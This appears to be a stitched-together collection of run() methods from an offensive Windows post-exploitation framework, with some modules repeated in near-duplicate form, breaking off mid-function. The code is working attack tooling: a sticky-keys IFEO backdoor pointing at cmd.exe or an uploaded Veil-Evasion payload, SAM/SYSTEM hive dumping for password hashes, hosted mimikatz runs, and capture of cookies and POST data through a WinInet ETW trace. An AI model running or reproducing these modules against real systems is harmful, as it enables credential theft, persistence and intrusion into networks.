        # invoking powershell.exe directly proves it is functional, not merely installed
        command = "powershell.exe -c \"$a=42;$a\""

        for target in self.targets:
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result.strip() == "42":
                verdict = "[*] Powershell detected"
            else:
                verdict = "[!] Powershell not detected"
            self.output += verdict + " as functional using creds '%s:%s' on : %s\n" % (username, password, target)
    def run(self):
        """Remove the sethc.exe IFEO ``Debugger`` value on each target.

        Deleting this value undoes the sticky-keys backdoor that the
        matching enable module sets. A line is appended to ``self.output``
        when there is no result file or when reg.exe reports success;
        other output is not reported.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        # reg.exe delete of the Image File Execution Options debugger entry
        disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
        credTag = "'" + username + ":" + password + "'"

        for target in self.targets:
            disableResult = command_methods.executeResult(target, username, password, disableSethcCommand, triggerMethod)

            if disableResult == "":
                self.output += "[!] No result file, SETHC backdoor disable failed using creds " + credTag + " on : " + target + "\n"
            elif "The operation completed successfully" in disableResult:
                self.output += "[*] SETHC backdoor successfully disabled using creds " + credTag + " on : " + target + "\n"
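    def run(self):
        """Collect recent-file .lnk shortcuts from each target's user profile.

        ``%USERPROFILE%`` is resolved on the target, then the four candidate
        Recent directories (shell and Office; pre-Vista and Vista+ layouts)
        are listed over SMB. Each entry ending in ``lnk`` is downloaded
        (left in place on the target), stored with ``helpers.saveModuleFile``
        and parsed with ``pylnker.parse_lnk``; progress and failures are
        appended to ``self.output``.

        A parse failure is reported and the loop continues. Only
        ``Exception`` is caught, so ``KeyboardInterrupt`` and ``SystemExit``
        still abort the module instead of being swallowed by a bare except.
        """
        # assume a single set of credentials for this module
        username, password = self.creds[0]
        trigger_method = self.required_options["trigger_method"][0]
        cred_tag = username + ":" + password

        for target in self.targets:
            user_profile = command_methods.executeResult(
                target, username, password, "echo %USERPROFILE%", trigger_method)
            if user_profile == '':
                self.output += " [!] No result file querying env variables using creds " + cred_tag + " on: " + target + "\n"
                continue

            # the remote echo comes back with a trailing CRLF
            user_profile = user_profile.strip(" \r\n")
            recent_dirs = [
                user_profile + "\\Recent",
                user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent",
                user_profile + "\\Application Data\\Microsoft\\Office\\Recent",
                user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent",
            ]
            self.output += " [*] Enumerating recent files on %s \n" % target

            for path in recent_dirs:
                # path_error=False: a missing directory is expected, not an error
                files = smb.ls(target, username, password, path, path_error=False)
                if not files:
                    continue
                self.output += " [*] Found %s files \n" % len(files)

                for entry in files:
                    if not entry.endswith("lnk"):
                        continue
                    out = smb.getFile(target, username, password, path + "\\" + entry, delete=False)
                    if out == '':
                        self.output += " [!] Failed retrieving : %s \n" % entry
                        continue
                    save_path = helpers.saveModuleFile(self, target, entry, out)
                    self.output += " [*] .lnk file %s saved from %s to %s\n" % (entry, path, save_path)
                    try:
                        parsed_lnk = pylnker.parse_lnk(save_path)
                        details_path = helpers.saveModuleFile(self, target, entry + '_details', parsed_lnk)
                    except Exception:
                        # report the bad shortcut and move on to the next one
                        self.output += " [!] Error while parsing : %s \n" % save_path
                    else:
                        self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path, details_path)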
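    def run(self):
        """Query a domain group's membership from each target with ``net group``.

        ``group`` comes from the module's required options; the remote
        command is always triggered through ``winexe`` regardless of the
        configured trigger method. An empty result is reported as "no result
        file", otherwise the raw ``net group`` output is appended to
        ``self.output``.
        """
        # assume single set of credentials
        username, password = self.creds[0]
        group = self.required_options["group"][0]

        # this module hard-codes winexe instead of reading trigger_method
        triggerMethod = "winexe"

        # the group name is interpolated into a remote command line; it is an
        # operator-supplied option, not output read back from a target
        command = "net group \"%s\" /domain" % (group)

        for target in self.targets:
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                # message fixed: stray doubled quote after the group name removed
                self.output += "[!] No result file, query for domain group '%s' failed using creds '%s:%s' on %s\n" % (group, username, password, target)
            else:
                # message fixed: "sucessful" -> "successful", doubled quote removed
                self.output += "[*] Query for domain group '%s' successful using creds '%s:%s' on %s:\n" % (group, username, password, target)
                self.output += result + "\n"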
    def run(self):
        """Report whether PowerShell is functional on each target.

        Runs ``powershell.exe -c "$a=42;$a"`` remotely; a stripped output
        of ``42`` counts as functional. One line per target goes to
        ``self.output``.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        credTag = "'" + username + ":" + password + "'"

        # executing a one-liner is a better functional test than checking the install key
        command = "powershell.exe -c \"$a=42;$a\""

        for target in self.targets:
            result = command_methods.executeResult(target, username, password, command, triggerMethod)
            functional = result.strip() == "42"

            if functional:
                self.output += "[*] Powershell detected as functional using creds " + credTag + " on : " + target + "\n"
            else:
                self.output += "[!] Powershell not detected as functional using creds " + credTag + " on : " + target + "\n"
    def run(self):
        """Delete the sethc.exe IFEO ``Debugger`` value on each target.

        This reverts the sticky-keys backdoor. ``self.output`` receives a
        line for a missing result file or for a reg.exe success message;
        any other output is ignored.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
        suffix = " using creds '%s:%s' on : " % (username, password)

        for target in self.targets:
            disableResult = command_methods.executeResult(
                target, username, password, disableSethcCommand, triggerMethod)

            if disableResult == "":
                self.output += "[!] No result file, SETHC backdoor disable failed" + suffix + target + "\n"
            elif "The operation completed successfully" in disableResult:
                self.output += "[*] SETHC backdoor successfully disabled" + suffix + target + "\n"
    def run(self):
        """Start an ETW trace of the Microsoft-Windows-WinInet provider on each target.

        ``logman`` creates a session named ``Status32`` writing to
        ``C:\\Windows\\Temp\\status32.etl``; the corresponding stop module
        (``logman stop Status32 -ets``) tears it down and parses the file.
        Each target gets one line in ``self.output``: started, no result
        file, or a generic failure.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        # real-time (-ets) trace session for the WinInet provider
        cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets"
        credTag = "'" + username + ":" + password + "'"

        for target in self.targets:
            etwResult = command_methods.executeResult(target, username, password, cmd, triggerMethod)

            if etwResult == "":
                self.output += "[!] ETW unsuccessfully started using creds " + credTag + " on  : " + target + ", no result file\n"
            elif "The command completed successfully." in etwResult:
                self.output += "[*] ETW started using creds " + credTag + " on  " + target + "\n"
            else:
                self.output += "[!] ETW unsuccessfully started using creds " + credTag + " on  : " + target + "\n"
    def run(self):
        """Turn off RDP on each target (``fDenyTSConnections`` = 1).

        Reports to ``self.output`` only when the command produced no result
        file or when reg.exe confirmed the write.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"
        suffix = " using creds '%s:%s' on : " % (username, password)

        for target in self.targets:
            rdpResult = command_methods.executeResult(
                target, username, password, rdpCMD, triggerMethod)

            if rdpResult == "":
                self.output += "[!] No result file, RDP disable failed" + suffix + target + "\n"
            elif "The operation completed successfully" in rdpResult:
                self.output += "[*] RDP successfully disabled" + suffix + target + "\n"
    def run(self):
        """Module skeleton: run a placeholder command on each target.

        Shows the expected shape of a module: take the first credential
        pair, execute a command through the configured trigger method,
        record output and cleanup text, and return ``(output, cleanup)``.
        The command and the success marker here are placeholders.
        """
        username, password = self.creds[0]

        for target in self.targets:
            print(" [*] Doing something on %s" % target)
            command = "something to do on the host"

            # trigger method is read per target from the module options
            triggerMethod = self.required_options["trigger_method"][0]
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            # record output and the matching cleanup entry on success
            if "something" in result:
                self.output += "action successful on " + target + "\n"
                # cleanup entries are tab-separated; see an existing module for the format
                self.cleanup += "cleanup command " + target + "\n"

        return (self.output, self.cleanup)
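    def run(self):
        """Run ``net group "<group>" /domain`` on each target and keep the output.

        The trigger method is fixed to ``winexe`` here; ``trigger_method``
        from the options is not consulted. An empty result is reported as
        "no result file"; otherwise the command output is appended verbatim
        to ``self.output``.
        """
        # assume single set of credentials
        username, password = self.creds[0]
        group = self.required_options["group"][0]

        # hard-coded trigger; the module does not read trigger_method
        triggerMethod = "winexe"

        # operator-supplied group name is embedded in the remote command line
        command = "net group \"%s\" /domain" % (group)
        credTag = "'%s:%s'" % (username, password)

        for target in self.targets:
            result = command_methods.executeResult(target, username, password,
                                                   command, triggerMethod)

            if result == "":
                # message fixed: removed the stray second quote after the group name
                self.output += "[!] No result file, query for domain group '" + group + "' failed using creds " + credTag + " on " + target + "\n"
            else:
                # message fixed: "sucessful" -> "successful", stray quote removed
                self.output += "[*] Query for domain group '" + group + "' successful using creds " + credTag + " on " + target + ":\n"
                self.output += result + "\n"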
    def run(self):
        """Read the EnableLUA policy value on each target and report UAC state.

        A ``reg query`` output containing ``0x1`` is reported as enabled,
        ``0x0`` as disabled; an empty result or anything else is reported
        as a failure. One line per target is appended to ``self.output``.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        # read-only query of the UAC policy value
        command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA"
        suffix = " using creds '" + username + ":" + password + "' on : "

        for target in self.targets:
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                status = "[!] No result file, check UAC failed"
            elif "0x1" in result:
                status = "[*] UAC enabled"
            elif "0x0" in result:
                status = "[*] UAC disabled"
            else:
                status = "[!] Error in checking UAC"
            self.output += status + suffix + target + "\n"
    def run(self):
        """Check whether UAC (EnableLUA) is on or off for each target.

        Queries the policy key with reg.exe; ``0x1`` in the output means
        enabled, ``0x0`` disabled. Empty or unrecognised output is reported
        as an error in ``self.output``.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        credTag = "'%s:%s'" % (username, password)

        # query only; this module does not modify the value
        command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA"

        for target in self.targets:
            result = command_methods.executeResult(target, username, password,
                                                   command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, check UAC failed using creds " + credTag + " on : " + target + "\n"
                continue
            if "0x1" in result:
                self.output += "[*] UAC enabled using creds " + credTag + " on : " + target + "\n"
            elif "0x0" in result:
                self.output += "[*] UAC disabled using creds " + credTag + " on : " + target + "\n"
            else:
                self.output += "[!] Error in checking UAC using creds " + credTag + " on : " + target + "\n"
    def run(self):
        """Begin a WinInet ETW trace session (``Status32``) on each target.

        The trace is written to ``C:\\Windows\\Temp\\status32.etl`` and is
        expected to be stopped and parsed by the matching stop module.
        ``self.output`` gets one line per target: started, no result file,
        or failed.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        suffix = " using creds '%s:%s' on  " % (username, password)

        cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets"

        for target in self.targets:
            etwResult = command_methods.executeResult(
                target, username, password, cmd, triggerMethod)

            if etwResult == "":
                self.output += "[!] ETW unsuccessfully started" + suffix + ": " + target + ", no result file\n"
            elif "The command completed successfully." in etwResult:
                self.output += "[*] ETW started" + suffix + target + "\n"
            else:
                self.output += "[!] ETW unsuccessfully started" + suffix + ": " + target + "\n"
    def run(self):
        """Stop the ``Status32`` ETW session on each target and extract matching lines.

        ``flag`` selects what is searched for in the trace text: ``post``
        (case-insensitive) searches for ``POST`` and stores the result as
        ``post_params.txt``; any other value searches for ``cookie added``
        and stores ``cookies.txt``. The trace is dumped with ``wevtutil``
        (waiting 20 s for the result), the ``.etl`` file is then deleted
        from the target, and non-empty output is saved via
        ``helpers.saveModuleFile``.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        flag = self.required_options["flag"][0]

        # normalise the search term and pick the output filename once
        if flag.lower() == "post":
            flag, moduleFile = "POST", "post_params.txt"
        else:
            flag, moduleFile = "cookie added", "cookies.txt"

        stopCMD = "logman stop Status32 -ets"
        # dump the trace as text and keep only lines containing the flag
        parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\""
        delCmd = "del C:\\Windows\\Temp\\status32.etl"
        credTag = "'" + username + ":" + password + "'"

        for target in self.targets:
            command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

            # pause=20 gives wevtutil time to finish; raise it if results come back empty
            parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

            # remove the trace file whether or not anything matched
            command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

            if parseResult == "":
                self.output += "[!] No ETW results for " + flag + " using creds " + credTag + " on : " + target + "\n"
                continue

            saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
            self.output += "[*] ETW results for " + flag + " using creds " + credTag + " on " + target + " stored at " + saveFile + "\n"
    def run(self):
        """Upload the bundled finddllhijack.exe to each target, run it and store the output.

        The binary under ``settings.VEIL_PILLAGE_PATH/data/misc`` is copied to
        ``C:\\Windows\\Temp\\`` over the ``C$`` share, executed through the
        configured trigger method (waiting 5 s for a result) and then deleted
        from the target. The returned text is written with
        ``helpers.saveModuleFile`` as ``finddllhijack.txt``; an empty result
        is reported as a failure in ``self.output``.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
        remoteExe = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:
            # stage the binary in C:\Windows\Temp\ via the admin share
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)

            out = command_methods.executeResult(target, username, password, remoteExe, triggerMethod, pause=5)

            # remove the staged binary regardless of the outcome
            command_methods.executeCommand(target, username, password, "del " + remoteExe, triggerMethod)

            # the result is saved even when empty; only the log line differs
            saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

            if out == "":
                self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
            else:
                self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
    def run(self):
        """Force-kill every powershell.exe process on each target.

        Runs ``taskkill /f /im powershell.exe`` through the configured
        trigger method; ``SUCCESS`` in the output is treated as confirmation.
        Both outcomes are logged to ``self.output`` with a ``[*]`` prefix.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        credTag = "'%s:%s'" % (username, password)

        killCMD = "taskkill /f /im powershell.exe"

        for target in self.targets:
            out = command_methods.executeResult(target, username, password, killCMD, triggerMethod=triggerMethod)

            if "SUCCESS" in out:
                outcome = "terminated"
            else:
                outcome = "failed to terminate"
            self.output += "[*] Powershell processes " + outcome + " using creds " + credTag + " on " + target + "\n"
    def run(self):
        """Template ``run``: placeholder command per target, returns output and cleanup.

        Illustrates the module contract: first credential pair, one remote
        command per target via the configured trigger method, output and
        cleanup text accumulated on ``self`` and returned as a tuple.
        """
        username, password = self.creds[0]

        for target in self.targets:
            print(" [*] Doing soemthing on %s" % target)
            command = "something to do on the host"

            trigger_method = self.required_options["trigger_method"][0]
            result = command_methods.executeResult(target, username, password, command, trigger_method)

            # on the placeholder success marker, log and queue a cleanup line
            if "something" in result:
                self.output += "action successful on " + target + "\n"
                # cleanup lines must be tab-separated; see a real module for the format
                self.cleanup += "cleanup command " + target + "\n"

        return (self.output, self.cleanup)
    def run(self):
        """Set the sethc.exe IFEO ``Debugger`` to cmd.exe on each target (sticky-keys backdoor).

        This is the well-known Image File Execution Options persistence
        technique; writes to this key are a common detection point. On a
        reg.exe success a reversing ``REG DELETE`` is appended to
        ``self.cleanup`` in the framework's pipe-delimited
        ``executeCommand|...`` format so the change can be undone.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\""
        cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
        credTag = "'" + username + ":" + password + "'"

        for target in self.targets:
            sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, SETHC backdoor enable failed using creds " + credTag + " on : " + target + "\n"
                continue
            if "The operation completed successfully" in sethcResult:
                self.output += "[*] SETHC backdoor successfully enabled using creds " + credTag + " on : " + target + "\n"
                # cleanup record: delete the Debugger value again
                self.cleanup += "|".join(["executeCommand", target, username, password, cleanupCMD, triggerMethod]) + "\n"
    def run(self):
        """Register cmd.exe as the IFEO debugger for sethc.exe on each target.

        Classic sticky-keys backdoor via Image File Execution Options.
        Success as reported by reg.exe is logged to ``self.output`` and a
        matching ``REG DELETE`` cleanup record is queued on ``self.cleanup``;
        a missing result file is logged as a failure.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        suffix = " using creds '%s:%s' on : " % (username, password)

        sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\""
        cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"

        for target in self.targets:
            sethcResult = command_methods.executeResult(
                target, username, password, sethcCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, SETHC backdoor enable failed" + suffix + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] SETHC backdoor successfully enabled" + suffix + target + "\n"
                # pipe-delimited cleanup entry that removes the Debugger value
                self.cleanup += "executeCommand|%s|%s|%s|%s|%s\n" % (target, username, password, cleanupCMD, triggerMethod)
    def run(self):
        """Detect PowerShell on each target via the ``PowerShell\\1 Install`` registry value.

        Result handling, in order: output starting with ``error:`` is an
        execution error; an empty result means no result file; ``0x1``
        means installed, ``0x0`` not installed; anything else is echoed to
        the console and logged as an error.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        credTag = "'" + username + ":" + password + "'"

        # registry query only; see the functional-check module for actually running powershell.exe
        command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"

        for target in self.targets:
            result = command_methods.executeResult(target, username, password, command, triggerMethod)
            where = " on : " + target + "\n"

            # the error check must precede the empty check to keep the same precedence
            if result.startswith("error:"):
                self.output += "[!] Error '" + result + "' in detecting powershell using creds " + credTag + where
            elif result == "":
                self.output += "[!] No result file, detect PowerShell failed using creds " + credTag + where
            elif "0x1" in result:
                self.output += "[*] PowerShell detected using creds " + credTag + where
            elif "0x0" in result:
                self.output += "[*] PowerShell not detected using creds " + credTag + where
            else:
                print "result:", result
                self.output += "[!] Error in detecting PowerShell using creds " + credTag + where
    def run(self):
        """Stage a payload .exe on each target and point the sethc.exe IFEO
        ``Debugger`` at it (sticky-keys backdoor), queuing a reversing cleanup.

        The payload is either generated with Veil-Evasion (``exe_path`` ==
        ``veil``; interactive menu unless ``self.args.p`` is given) or taken
        from a local path. It is copied to ``/tmp/<upload_name>``, uploaded
        to ``C:\\Windows\\`` over ``C$`` and registered with ``REG ADD``.
        Returns ``""`` early if payload generation was abandoned or the local
        path does not exist; otherwise results go to ``self.output`` and a
        ``REG DELETE`` record to ``self.cleanup``.
        """

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        uploadName = self.required_options["upload_name"][0]


        # if we're using Veil-Evasion for payload generation
        if self.required_options["exe_path"][0].lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # check various possibly flags passed by the command line

            # if we don't have payload specified, jump to the main controller menu
            # (blocks on operator input until Veil-Evasion returns a path or nothing)
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
            else:
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        # NOTE(review): a value containing '=' makes this raise
                        # ValueError on unpack; split("=", 1) would be safer
                        name,value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)


            # nicely print the title and module name again (since Veil-Evasion trashes this)
            messages.title()
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            # NOTE(review): `payloadPath == ""` is already covered by `not payloadPath`
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
        else:
            payloadPath = self.required_options["exe_path"][0]

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""


        # make sure the name ends with ".exe"
        if not uploadName.endswith(".exe"):
            uploadName += ".exe"

        # copy the resulting binary into the temporary directory with the appropriate name
        # SECURITY(review): shell command assembled from operator-supplied path strings,
        # and the staging file lives at a fixed, predictable /tmp path; shutil.copy
        # (no shell, handles spaces) into a private temp dir would be the safer form
        os.system("cp "+payloadPath+" /tmp/"+uploadName)

        for target in self.targets:

            # only the last path component is echoed in the output line
            baseName = payloadPath.split("/")[-1]

            # upload the payload to C:\Windows\System32\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)            
            self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"

            # the registry command to set up the sethc stickkeys backdoor for the binary
            # (IFEO Debugger redirection; writes to this key are a standard detection point)
            sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"

                # build our cleanup -> deleting this registry run value
                # (the uploaded binary itself is not removed by this record)
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

        for target in self.targets:

            powershellInstalled = False

            # check if we're forcing a particular grab method
            if force_method.lower() == "binary":
                powershellInstalled = False
            elif force_method.lower() == "powershell":
                powershellInstalled = True
            else:
                # check if we have a functional Powershell installation
                powershellCommand = 'powershell.exe -c "$a=42;$a"'
                powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
                if powershellResult.strip() == "42":
                    powershellInstalled = True

            if powershellInstalled:

                # do powersploit combined file of invoke-mimikatz and powerdump
                print helpers.color("\n [*] Powershell installed on " + target)
                self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # path to the combined Invoke-Mimikatz/powerdump powershell script
                secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                # trigger the powershell download on just this target
                delivery_methods.powershellHostTrigger(
                    target,
                    username,
                    password,
                    secondStagePath,
                    lhost,
                    "",
                    triggerMethod="winexe",
                    outFile=out_file,
                    ssl=use_ssl,
                    noArch=True,
                )

                print "\n [*] Waiting " + delay + "s for Autograb to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # parse the powerdump component
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                if out != "":
                    self.output += (
                        "[*] Autograb.ps1 results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Autograb.ps1 failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

            else:
                # do reg.exe for hashdump and host/execute for mimikatz
                print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
                print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
                self.output += "[!] Powershell not installed on " + target + "\n"

                # reg.exe command to save off the hives
                regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

                # execute the registry save command
                command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")

                print helpers.color("\n [*] Dumping hashes on " + target)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # grab all of the backed up files
                systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
                securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
                samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)

                # more error-checking here?
                if systemFile == "":
                    self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/system", "w")
                    f.write(systemFile)
                    f.close()

                if securityFile == "":
                    self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/security", "w")
                    f.write(securityFile)
                    f.close()

                if samFile == "":
                    self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/sam", "w")
                    f.write(samFile)
                    f.close()

                # get all the hashes from these hives
                out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # save the output file off
                saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
                self.output += (
                    "[*] dumped hashes (reg.exe) using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " saved to "
                    + saveLocation
                    + "\n"
                )

                # save these off to the universal list
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                # now, detect the architecture
                archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
                arch = "x86"
                if "64" in archResult:
                    arch = "x64"

                # now time for ze mimikatz!
                mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file

                # host mimikatz.exe and trigger it ONLY on this particular machine
                # so we can get the architecture correct
                delivery_methods.hostTrigger(
                    target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
                )

                print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

                if out != "":
                    self.output += (
                        "[*] Mimikatz results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Mimikatz failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
